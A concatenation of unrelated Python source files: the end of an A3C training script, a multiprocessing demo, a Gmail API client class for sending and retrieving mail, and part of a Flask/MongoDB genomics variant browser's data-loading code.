#worker2 = A3C_Worker(env, tf.train.Coordinator, global_net, 'worker2')
#worker1.train(env)
#worker2.train(env)
#test
if test:
for i, worker in enumerate(workers):
env = gym.make(env_name)
env.seed(i)
worker.test(gym.make(env_name))
env.close()
'''
#init the global net, worker agents
coordinator = tf.train.Coordinator()
global_net = A3C_Net()
workers = []
for _ in range(worker_max):
worker = A3C_worker(coordinator, global_net)
work = lambda:
thread = threading.Thread(target=work)
coord.join(workers)
'''
if __name__ == '__main__':
main()
|
mp_test.py | import multiprocessing as mp
import os
# https://www.maxlist.xyz/2020/03/15/python-threading/
class Dosomething:
def __init__(self):
self.p_list = []
def dosomething(self, i):
print('第' + str(i))
print('多程序 ID:' + str(os.getpid()))
def run(self):
for i in range(5):
self.p_list.append(
mp.Process(target=self.dosomething, args=(str(i))))
self.p_list[i].start()
for i in self.p_list:
i.join()
if __name__ == "__main__":
d = Dosomething()
d.run()
|
gmail.py | """
File: gmail.py
--------------
Home to the main Gmail service object. Currently supports sending mail (with
attachments) and retrieving mail with the full suite of Gmail search options.
"""
import base64
from email.mime.audio import MIMEAudio
from email.mime.application import MIMEApplication
from email.mime.base import MIMEBase
from email.mime.image import MIMEImage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import html
import math
import mimetypes
import os
import re
import threading
from typing import List, Optional
from bs4 import BeautifulSoup
import dateutil.parser as parser
from googleapiclient.discovery import build
from googleapiclient.errors import HttpError
from httplib2 import Http
from oauth2client import client, file, tools
from oauth2client.clientsecrets import InvalidClientSecretsError
from simplegmail import label
from simplegmail.attachment import Attachment
from simplegmail.label import Label
from simplegmail.message import Message
class Gmail(object):
"""
The Gmail class which serves as the entrypoint for the Gmail service API.
Args:
client_secret_file: The name of the user's client secret file.
Attributes:
client_secret_file (str): The name of the user's client secret file.
service (googleapiclient.discovery.Resource): The Gmail service object.
"""
# Allow Gmail to read and write emails, and access settings like aliases.
_SCOPES = [
'https://www.googleapis.com/auth/gmail.modify',
'https://www.googleapis.com/auth/gmail.settings.basic'
]
# If you don't have a client secret file, follow the instructions at:
# https://developers.google.com/gmail/api/quickstart/python
# Make sure the client secret file is in the root directory of your app.
def __init__(
self,
client_secret_file: str = 'client_secret.json',
creds_file: str = 'gmail_token.json',
_creds: Optional[client.OAuth2Credentials] = None
) -> None:
self.client_secret_file = client_secret_file
self.creds_file = creds_file
try:
# The file gmail_token.json stores the user's access and refresh
# tokens, and is created automatically when the authorization flow
# completes for the first time.
if _creds:
self.creds = _creds
else:
store = file.Storage(self.creds_file)
self.creds = store.get()
if not self.creds or self.creds.invalid:
# Will ask you to authenticate an account in your browser.
flow = client.flow_from_clientsecrets(
self.client_secret_file, self._SCOPES
)
flags = tools.argparser.parse_args([])
self.creds = tools.run_flow(flow, store, flags)
self._service = build(
'gmail', 'v1', http=self.creds.authorize(Http()),
cache_discovery=False
)
except InvalidClientSecretsError:
raise FileNotFoundError(
"Your 'client_secret.json' file is nonexistent. Make sure "
"the file is in the root directory of your application. If "
"you don't have a client secrets file, go to https://"
"developers.google.com/gmail/api/quickstart/python, and "
"follow the instructions listed there."
)
@property
def service(self) -> 'googleapiclient.discovery.Resource':
# Since the token is only used through calls to the service object,
# this ensure that the token is always refreshed before use.
if self.creds.access_token_expired:
self.creds.refresh(Http())
return self._service
def send_message(
self,
sender: str,
to: str,
subject: str = '',
msg_html: Optional[str] = None,
msg_plain: Optional[str] = None,
cc: Optional[List[str]] = None,
bcc: Optional[List[str]] = None,
attachments: Optional[List[str]] = None,
signature: bool = False,
user_id: str = 'me'
) -> Message:
"""
Sends an email.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email. This is
often displayed on slow or old browsers, or if the HTML message
is not provided.
cc: The list of email addresses to be cc'd.
bcc: The list of email addresses to be bcc'd.
attachments: The list of attachment file names.
signature: Whether the account signature should be added to the
message.
user_id: The address of the sending account. 'me' for the
default address associated with the account.
Returns:
The Message object representing the sent message.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
msg = self._create_message(
sender, to, subject, msg_html, msg_plain, cc=cc, bcc=bcc,
attachments=attachments, signature=signature, user_id=user_id
)
try:
req = self.service.users().messages().send(userId='me', body=msg)
res = req.execute()
return self._build_message_from_ref(user_id, res, 'reference')
except HttpError as error:
# Pass along the error
raise error
def get_unread_inbox(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets unread messages from your inbox.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Labels that messages must match.
query: A Gmail query to match.
attachments: Accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.INBOX)
return self.get_unread_messages(user_id, labels, query)
def get_starred_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets starred messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.STARRED)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_important_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets messages marked important from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.IMPORTANT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_unread_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets unread messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.UNREAD)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_drafts(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets drafts saved in your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.DRAFT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_sent_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets sent messages from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: Whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SENT)
return self.get_messages(user_id, labels, query, attachments,
include_spam_trash)
def get_trash_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets messages in your trash from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.TRASH)
return self.get_messages(user_id, labels, query, attachments, True)
def get_spam_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference'
) -> List[Message]:
"""
Gets messages marked as spam from your account.
Args:
user_id: The user's email address. By default, the authenticated
user.
labels: Label IDs messages must match.
query: A Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels.append(label.SPAM)
return self.get_messages(user_id, labels, query, attachments, True)
def get_messages(
self,
user_id: str = 'me',
labels: Optional[List[Label]] = None,
query: str = '',
attachments: str = 'reference',
include_spam_trash: bool = False
) -> List[Message]:
"""
Gets messages from your account.
Args:
user_id: the user's email address. Default 'me', the authenticated
user.
labels: label IDs messages must match.
query: a Gmail query to match.
attachments: accepted values are 'ignore' which completely
ignores all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
include_spam_trash: whether to include messages from spam or trash.
Returns:
A list of message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if labels is None:
labels = []
labels_ids = [
lbl.id if isinstance(lbl, Label) else lbl for lbl in labels
]
try:
response = self.service.users().messages().list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash
).execute()
message_refs = []
if 'messages' in response: # ensure request was successful
message_refs.extend(response['messages'])
while 'nextPageToken' in response:
page_token = response['nextPageToken']
response = self.service.users().messages().list(
userId=user_id,
q=query,
labelIds=labels_ids,
includeSpamTrash=include_spam_trash,
pageToken=page_token
).execute()
message_refs.extend(response['messages'])
return self._get_messages_from_refs(user_id, message_refs,
attachments)
except HttpError as error:
# Pass along the error
raise error
def list_labels(self, user_id: str = 'me') -> List[Label]:
"""
Retrieves all labels for the specified user.
These Label objects are to be used with other functions like
modify_labels().
Args:
user_id: The user's email address. By default, the authenticated
user.
Returns:
The list of Label objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
try:
res = self.service.users().labels().list(
userId=user_id
).execute()
except HttpError as error:
# Pass along the error
raise error
else:
labels = [Label(name=x['name'], id=x['id']) for x in res['labels']]
return labels
def _get_messages_from_refs(
self,
user_id: str,
message_refs: List[dict],
attachments: str = 'reference',
parallel: bool = True
) -> List[Message]:
"""
Retrieves the actual messages from a list of references.
Args:
user_id: The account the messages belong to.
message_refs: A list of message references with keys id, threadId.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download'
which downloads the attachment data to store locally. Default
'reference'.
parallel: Whether to retrieve messages in parallel. Default true.
Currently parallelization is always on, since there is no
reason to do otherwise.
Returns:
A list of Message objects.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if not message_refs:
return []
if not parallel:
return [self._build_message_from_ref(user_id, ref, attachments)
for ref in message_refs]
max_num_threads = 12 # empirically chosen, prevents throttling
target_msgs_per_thread = 10 # empirically chosen
num_threads = min(
math.ceil(len(message_refs) / target_msgs_per_thread),
max_num_threads
)
batch_size = math.ceil(len(message_refs) / num_threads)
message_lists = [None] * num_threads
def thread_download_batch(thread_num):
gmail = Gmail(_creds=self.creds)
start = thread_num * batch_size
end = min(len(message_refs), (thread_num + 1) * batch_size)
message_lists[thread_num] = [
gmail._build_message_from_ref(
user_id, message_refs[i], attachments
)
for i in range(start, end)
]
threads = [
threading.Thread(target=thread_download_batch, args=(i,))
for i in range(num_threads)
]
for t in threads:
t.start()
for t in threads:
t.join()
return sum(message_lists, [])
def _build_message_from_ref(
self,
user_id: str,
message_ref: dict,
attachments: str = 'reference'
) -> Message:
"""
Creates a Message object from a reference.
Args:
user_id: The username of the account the message belongs to.
message_ref: The message reference object returned from the Gmail
API.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
The Message object.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
try:
# Get message JSON
message = self.service.users().messages().get(
userId=user_id, id=message_ref['id']
).execute()
except HttpError as error:
# Pass along the error
raise error
else:
msg_id = message['id']
thread_id = message['threadId']
label_ids = []
if 'labelIds' in message:
user_labels = {x.id: x for x in self.list_labels(user_id=user_id)}
label_ids = [user_labels[x] for x in message['labelIds']]
snippet = html.unescape(message['snippet'])
payload = message['payload']
headers = payload['headers']
# Get header fields (date, from, to, subject)
date = ''
sender = ''
recipient = ''
subject = ''
msg_hdrs = {}
for hdr in headers:
if hdr['name'].lower() == 'date':
try:
date = str(parser.parse(hdr['value']).astimezone())
except Exception:
date = hdr['value']
elif hdr['name'].lower() == 'from':
sender = hdr['value']
elif hdr['name'].lower() == 'to':
recipient = hdr['value']
elif hdr['name'].lower() == 'subject':
subject = hdr['value']
msg_hdrs[hdr['name']] = hdr['value']
parts = self._evaluate_message_payload(
payload, user_id, message_ref['id'], attachments
)
plain_msg = None
html_msg = None
attms = []
for part in parts:
if part['part_type'] == 'plain':
if plain_msg is None:
plain_msg = part['body']
else:
plain_msg += '\n' + part['body']
elif part['part_type'] == 'html':
if html_msg is None:
html_msg = part['body']
else:
html_msg += '<br/>' + part['body']
elif part['part_type'] == 'attachment':
attm = Attachment(self.service, user_id, msg_id,
part['attachment_id'], part['filename'],
part['filetype'], part['data'])
attms.append(attm)
return Message(self.service, self.creds, user_id, msg_id,
thread_id, recipient, sender, subject, date, snippet,
plain_msg, html_msg, label_ids, attms, msg_hdrs)
def _evaluate_message_payload(
self,
payload: dict,
user_id: str,
msg_id: str,
attachments: str = 'reference'
) ->List[dict]:
"""
Recursively evaluates a message payload.
Args:
payload: The message payload object (response from Gmail API).
user_id: The current account address (default 'me').
msg_id: The id of the message.
attachments: Accepted values are 'ignore' which completely ignores
all attachments, 'reference' which includes attachment
information but does not download the data, and 'download' which
downloads the attachment data to store locally. Default
'reference'.
Returns:
A list of message parts.
Raises:
googleapiclient.errors.HttpError: There was an error executing the
HTTP request.
"""
if 'attachmentId' in payload['body']: # if it's an attachment
if attachments == 'ignore':
return []
att_id = payload['body']['attachmentId']
filename = payload['filename']
if not filename:
filename = 'unknown'
obj = {
'part_type': 'attachment',
'filetype': payload['mimeType'],
'filename': filename,
'attachment_id': att_id,
'data': None
}
if attachments == 'reference':
return [obj]
else: # attachments == 'download'
if 'data' in payload['body']:
data = payload['body']['data']
else:
res = self.service.users().messages().attachments().get(
userId=user_id, messageId=msg_id, id=att_id
).execute()
data = res['data']
file_data = base64.urlsafe_b64decode(data)
obj['data'] = file_data
return [obj]
elif payload['mimeType'] == 'text/html':
data = payload['body']['data']
data = base64.urlsafe_b64decode(data)
body = BeautifulSoup(data, 'lxml', from_encoding='utf-8').body
return [{ 'part_type': 'html', 'body': str(body) }]
elif payload['mimeType'] == 'text/plain':
data = payload['body']['data']
data = base64.urlsafe_b64decode(data)
body = data.decode('UTF-8')
return [{ 'part_type': 'plain', 'body': body }]
elif payload['mimeType'].startswith('multipart'):
ret = []
if 'parts' in payload:
for part in payload['parts']:
ret.extend(self._evaluate_message_payload(part, user_id, msg_id,
attachments))
return ret
return []
def _create_message(
self,
sender: str,
to: str,
subject: str = '',
msg_html: str = None,
msg_plain: str = None,
cc: List[str] = None,
bcc: List[str] = None,
attachments: List[str] = None,
signature: bool = False,
user_id: str = 'me'
) -> dict:
"""
Creates the raw email message to be sent.
Args:
sender: The email address the message is being sent from.
to: The email address the message is being sent to.
subject: The subject line of the email.
msg_html: The HTML message of the email.
msg_plain: The plain text alternate message of the email (for slow
or old browsers).
cc: The list of email addresses to be Cc'd.
bcc: The list of email addresses to be Bcc'd
attachments: A list of attachment file paths.
signature: Whether the account signature should be added to the
message. Will add the signature to your HTML message only, or a
create a HTML message if none exists.
Returns:
The message dict.
"""
msg = MIMEMultipart('mixed' if attachments else 'alternative')
msg['To'] = to
msg['From'] = sender
msg['Subject'] = subject
if cc:
msg['Cc'] = ', '.join(cc)
if bcc:
msg['Bcc'] = ', '.join(bcc)
if signature:
m = re.match(r'.+\s<(?P<addr>.+@.+\..+)>', sender)
address = m.group('addr') if m else sender
account_sig = self._get_alias_info(address, user_id)['signature']
if msg_html is None:
msg_html = ''
msg_html += "<br /><br />" + account_sig
attach_plain = MIMEMultipart('alternative') if attachments else msg
attach_html = MIMEMultipart('related') if attachments else msg
if msg_plain:
attach_plain.attach(MIMEText(msg_plain, 'plain'))
if msg_html:
attach_html.attach(MIMEText(msg_html, 'html'))
if attachments:
attach_plain.attach(attach_html)
msg.attach(attach_plain)
self._ready_message_with_attachments(msg, attachments)
return {
'raw': base64.urlsafe_b64encode(msg.as_string().encode()).decode()
}
def _ready_message_with_attachments(
self,
msg: MIMEMultipart,
attachments: List[str]
) -> None:
"""
Converts attachment filepaths to MIME objects and adds them to msg.
Args:
msg: The message to add attachments to.
attachments: A list of attachment file paths.
"""
for filepath in attachments:
content_type, encoding = mimetypes.guess_type(filepath)
if content_type is None or encoding is not None:
content_type = 'application/octet-stream'
main_type, sub_type = content_type.split('/', 1)
with open(filepath, 'rb') as file:
raw_data = file.read()
attm: MIMEBase
if main_type == 'text':
attm = MIMEText(raw_data.decode('UTF-8'), _subtype=sub_type)
elif main_type == 'image':
attm = MIMEImage(raw_data, _subtype=sub_type)
elif main_type == 'audio':
attm = MIMEAudio(raw_data, _subtype=sub_type)
elif main_type == 'application':
attm = MIMEApplication(raw_data, _subtype=sub_type)
else:
attm = MIMEBase(main_type, sub_type)
attm.set_payload(raw_data)
fname = os.path.basename(filepath)
attm.add_header('Content-Disposition', 'attachment', filename=fname)
msg.attach(attm)
def _get_alias_info(
self,
send_as_email: str,
user_id: str = 'me'
) -> dict:
"""
Returns the alias info of an email address on the authenticated
account.
Response data is of the following form:
{
"sendAsEmail": string,
"displayName": string,
"replyToAddress": string,
"signature": string,
"isPrimary": boolean,
"isDefault": boolean,
"treatAsAlias": boolean,
"smtpMsa": {
"host": string,
"port": integer,
"username": string,
"password": string,
"securityMode": string
},
"verificationStatus": string
}
Args:
send_as_email: The alias account information is requested for
(could be the primary account).
user_id: The user ID of the authenticated user the account the
alias is for (default "me").
Returns:
The dict of alias info associated with the account.
"""
req = self.service.users().settings().sendAs().get(
sendAsEmail=send_as_email, userId=user_id)
res = req.execute()
return res
|
exac.py | import itertools
import json
import os
import pymongo
import pysam
import gzip
from parsing import *
import logging
import lookups
import random
import sys
from utils import *
from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash, jsonify, send_from_directory
from flask.ext.compress import Compress
from flask.ext.runner import Runner
from flask_errormail import mail_on_500
from flask import Response
from collections import defaultdict, OrderedDict
from werkzeug.contrib.cache import SimpleCache
from multiprocessing import Process
import glob
import sqlite3
import traceback
import time
logging.getLogger().addHandler(logging.StreamHandler())
logging.getLogger().setLevel(logging.INFO)
ADMINISTRATORS = (
'exac.browser.errors@gmail.com',
)
app = Flask(__name__)
mail_on_500(app, ADMINISTRATORS)
Compress(app)
app.config['COMPRESS_DEBUG'] = True
cache = SimpleCache()
EXAC_FILES_DIRECTORY = '../exac_data/'
REGION_LIMIT = 1E5
EXON_PADDING = 50
# Load default config and override config from an environment variable
app.config.update(dict(
DB_HOST='localhost',
DB_PORT=27017,
DB_NAME='exac',
DEBUG=True,
SECRET_KEY='development key',
LOAD_DB_PARALLEL_PROCESSES = 4, # contigs assigned to threads, so good to make this a factor of 24 (eg. 2,3,4,6,8)
SITES_VCFS=glob.glob(os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'ExAC*.vcf.gz')),
GENCODE_GTF=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'gencode.gtf.gz'),
CANONICAL_TRANSCRIPT_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'canonical_transcripts.txt.gz'),
OMIM_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'omim_info.txt.gz'),
BASE_COVERAGE_FILES=glob.glob(os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'coverage', 'Panel.*.coverage.txt.gz')),
DBNSFP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'dbNSFP2.6_gene.gz'),
CONSTRAINT_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'forweb_cleaned_exac_r03_march16_z_data_pLI_CNV-final.txt.gz'),
MNP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'MNPs_NotFiltered_ForBrowserRelease.txt.gz'),
CNV_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'exac-gencode-exon.cnt.final.pop3'),
CNV_GENE_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'exac-final-cnvs.gene.rank'),
# How to get a dbsnp142.txt.bgz file:
# wget ftp://ftp.ncbi.nlm.nih.gov/snp/organisms/human_9606_b142_GRCh37p13/database/organism_data/b142_SNPChrPosOnRef_105.bcp.gz
# zcat b142_SNPChrPosOnRef_105.bcp.gz | awk '$3 != ""' | perl -pi -e 's/ +/\t/g' | sort -k2,2 -k3,3n | bgzip -c > dbsnp142.txt.bgz
# tabix -s 2 -b 3 -e 3 dbsnp142.txt.bgz
DBSNP_FILE=os.path.join(os.path.dirname(__file__), EXAC_FILES_DIRECTORY, 'dbsnp142.txt.bgz'),
READ_VIZ_DIR="/mongo/readviz"
))
GENE_CACHE_DIR = os.path.join(os.path.dirname(__file__), 'gene_cache')
GENES_TO_CACHE = {l.strip('\n') for l in open(os.path.join(os.path.dirname(__file__), 'genes_to_cache.txt'))}
def connect_db():
"""
Connects to the specific database.
"""
client = pymongo.MongoClient(host=app.config['DB_HOST'], port=app.config['DB_PORT'])
return client[app.config['DB_NAME']]
def parse_tabix_file_subset(tabix_filenames, subset_i, subset_n, record_parser):
"""
Returns a generator of parsed record objects (as returned by record_parser) for the i'th out n subset of records
across all the given tabix_file(s). The records are split by files and contigs within files, with 1/n of all contigs
from all files being assigned to this the i'th subset.
Args:
tabix_filenames: a list of one or more tabix-indexed files. These will be opened using pysam.Tabixfile
subset_i: zero-based number
subset_n: total number of subsets
record_parser: a function that takes a file-like object and returns a generator of parsed records
"""
start_time = time.time()
open_tabix_files = [pysam.Tabixfile(tabix_filename) for tabix_filename in tabix_filenames]
tabix_file_contig_pairs = [(tabix_file, contig) for tabix_file in open_tabix_files for contig in tabix_file.contigs]
tabix_file_contig_subset = tabix_file_contig_pairs[subset_i : : subset_n] # get every n'th tabix_file/contig pair
short_filenames = ", ".join(map(os.path.basename, tabix_filenames))
num_file_contig_pairs = len(tabix_file_contig_subset)
print(("Loading subset %(subset_i)s of %(subset_n)s total: %(num_file_contig_pairs)s contigs from "
"%(short_filenames)s") % locals())
counter = 0
for tabix_file, contig in tabix_file_contig_subset:
header_iterator = tabix_file.header
records_iterator = tabix_file.fetch(contig, 0, 10**9, multiple_iterators=True)
for parsed_record in record_parser(itertools.chain(header_iterator, records_iterator)):
counter += 1
yield parsed_record
if counter % 100000 == 0:
seconds_elapsed = int(time.time()-start_time)
print(("Loaded %(counter)s records from subset %(subset_i)s of %(subset_n)s from %(short_filenames)s "
"(%(seconds_elapsed)s seconds)") % locals())
print("Finished loading subset %(subset_i)s from %(short_filenames)s (%(counter)s records)" % locals())
def load_base_coverage():
def load_coverage(coverage_files, i, n, db):
coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file)
try:
db.base_coverage.insert(coverage_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when coverage_generator is empty
db = get_db()
db.base_coverage.drop()
print("Dropped db.base_coverage")
# load coverage first; variant info will depend on coverage
db.base_coverage.ensure_index('xpos')
procs = []
coverage_files = app.config['BASE_COVERAGE_FILES']
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
random.shuffle(app.config['BASE_COVERAGE_FILES'])
for i in range(num_procs):
p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time)
def load_variants_file():
def load_variants(sites_file, i, n, db):
variants_generator = parse_tabix_file_subset([sites_file], i, n, get_variants_from_sites_vcf)
try:
db.variants.insert(variants_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when variant_generator is empty
db = get_db()
db.variants.drop()
print("Dropped db.variants")
# grab variants from sites VCF
db.variants.ensure_index('xpos')
db.variants.ensure_index('xstart')
db.variants.ensure_index('xstop')
db.variants.ensure_index('rsid')
db.variants.ensure_index('genes')
db.variants.ensure_index('transcripts')
sites_vcfs = app.config['SITES_VCFS']
if len(sites_vcfs) == 0:
raise IOError("No vcf file found")
elif len(sites_vcfs) > 1:
raise Exception("More than one sites vcf file found: %s" % sites_vcfs)
procs = []
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
for i in range(num_procs):
p = Process(target=load_variants, args=(sites_vcfs[0], i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading variants. Took %s seconds' % int(time.time() - start_time)
def load_constraint_information():
db = get_db()
db.constraint.drop()
print 'Dropped db.constraint.'
start_time = time.time()
with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file:
for transcript in get_constraint_information(constraint_file):
db.constraint.insert(transcript, w=0)
db.constraint.ensure_index('transcript')
print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time)
def load_mnps():
db = get_db()
start_time = time.time()
db.variants.ensure_index('has_mnp')
print 'Done indexing.'
while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}):
pass
print 'Deleted MNP data.'
with gzip.open(app.config['MNP_FILE']) as mnp_file:
for mnp in get_mnp_data(mnp_file):
variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True)
db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0)
db.variants.ensure_index('has_mnp')
print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time)
def load_gene_models():
db = get_db()
db.genes.drop()
db.transcripts.drop()
db.exons.drop()
print 'Dropped db.genes, db.transcripts, and db.exons.'
start_time = time.time()
canonical_transcripts = {}
with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file:
for gene, transcript in get_canonical_transcripts(canonical_transcript_file):
canonical_transcripts[gene] = transcript
omim_annotations = {}
with gzip.open(app.config['OMIM_FILE']) as omim_file:
for fields in get_omim_associations(omim_file):
if fields is None:
continue
gene, transcript, accession, description = fields
omim_annotations[gene] = (accession, description)
dbnsfp_info = {}
with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file:
for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file):
other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']]
dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names)
print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time)
# grab genes from GTF
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
for gene in get_genes_from_gencode_gtf(gtf_file):
gene_id = gene['gene_id']
if gene_id in canonical_transcripts:
gene['canonical_transcript'] = canonical_transcripts[gene_id]
if gene_id in omim_annotations:
gene['omim_accession'] = omim_annotations[gene_id][0]
gene['omim_description'] = omim_annotations[gene_id][1]
if gene_id in dbnsfp_info:
gene['full_gene_name'] = dbnsfp_info[gene_id][0]
gene['other_names'] = dbnsfp_info[gene_id][1]
db.genes.insert(gene, w=0)
print 'Done loading genes. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.genes.ensure_index('gene_id')
db.genes.ensure_index('gene_name_upper')
db.genes.ensure_index('gene_name')
db.genes.ensure_index('other_names')
db.genes.ensure_index('xstart')
db.genes.ensure_index('xstop')
print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time)
# and now transcripts
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.transcripts.ensure_index('transcript_id')
db.transcripts.ensure_index('gene_id')
print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time)
# Building up gene definitions
start_time = time.time()
